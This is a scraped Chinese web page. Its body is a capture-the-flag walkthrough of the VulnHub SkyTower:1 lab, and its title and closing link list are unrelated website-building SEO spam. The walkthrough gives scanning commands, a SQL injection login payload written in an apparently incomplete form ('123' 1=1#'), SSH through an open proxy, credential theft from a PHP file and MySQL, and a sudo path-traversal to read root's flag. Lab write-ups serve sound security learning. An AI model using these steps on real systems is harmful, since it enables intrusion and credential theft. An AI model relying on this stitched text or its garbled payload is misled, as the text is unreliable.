当前位置: 首页 > news >正文

泰安祥奕网络网站建设模板无锡网站制作优化

泰安祥奕网络网站建设模板,无锡网站制作优化,个人做网站开发,平面设计配色一、安装配置靶机 下载地址: SkyTower: 1 ~ VulnHub 下载之后解压发现是VirtualBox格式的 我们下载一个VirtualBox,这是官网 Downloads – Oracle VirtualBox 安装到默认路径就 打开后点击注册 选择解压后的vbox文件 然后点击左上角管理 点击导出虚拟电脑&…

一、安装配置靶机

下载地址:

SkyTower: 1 ~ VulnHub

下载之后解压发现是VirtualBox格式的

我们下载一个VirtualBox,这是官网

Downloads – Oracle VirtualBox

安装到默认路径就

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个镜像文件

用vmware打开

默认网卡模式为仅主机,更改为NAT模式

C段扫描获得IP

arp-scan -l

端口扫描一下发现22,80,3128

nmap 192.168.230.128

访问一下80端口

发现一个登录框

发现登录框,我们测sql注入

邮箱随便输入一个,密码我们输入

123' 1=1#

登录成功发现账号密码

想到远程连接22端口

发现无效

想到3128端口尝试挂上代理连接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登录成功

开始提权

sudo -l

发现没有可以提权的

想到了80端口界面存在sql注入

cat /var/www/login.php

发现数据库信息

登录成功

mysql -u root SkyTech -p

查看数据库信息

show databases;

逐个查看找到

use SkyTech;
show tables;

得到账号密码

select * from login

ssh登录

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有权限

pwd

发现在根目录下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密码

远程连接提权成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"

http://www.tj-hxxt.cn/news/118798.html

相关文章:

  • 惠州网站建设哪里找seo工资服务
  • 用ps怎样做网站文字logo手机百度app免费下载
  • 网站建设费专用发票能不能抵扣百度代理公司怎么样
  • 建设一个网站可以采用哪几种方案惠州网络推广
  • dom手表官方网站免费网站统计代码
  • 德州网站推广重庆小潘seo
  • 上海 做网站资源搜索引擎
  • 怎样在网站图片做超级链接网站seo视频
  • 网络广告推广网站统计网站访问量
  • 网站后台根据前端做吗西安seo关键词推广
  • 手机wap网站是什么网络营销推广专家
  • 网页游戏排行榜前十名大型网络游戏常州seo外包公司
  • 永年专业做网站山东省住房和城乡建设厅
  • 文创产品设计大全长沙seo服务哪个公司好
  • 政府网站做外链电商运营转行后悔了
  • 深圳高端网站建设公司2023知名品牌营销案例100例
  • 品牌策划网站推荐搜索引擎的关键词优化
  • 华为网站搭建重庆网站seo公司
  • 宣武上海网站建设香飘飘奶茶软文
  • 检测网站是用什么代码做的软件广东: 确保科学精准高效推进疫情
  • 图片类网站建设网络营销师资格证报名
  • 网站怎么做竞价深圳网络营销和推广方案
  • 某互联网公司触屏网站东莞商城网站建设
  • 重庆网站建设 快速建站广告推广
  • dede 友情链接 网站简况 调用长沙谷歌seo
  • 做网站需要什么素材网络营销考试答案
  • 网站运营优化推广淘宝优化关键词的步骤
  • 一般专业网站建设公司网址搜索引擎
  • 节日的网站怎么做全网搜索引擎
  • 在线做网站 自动生成手机版百度搜图匹配相似图片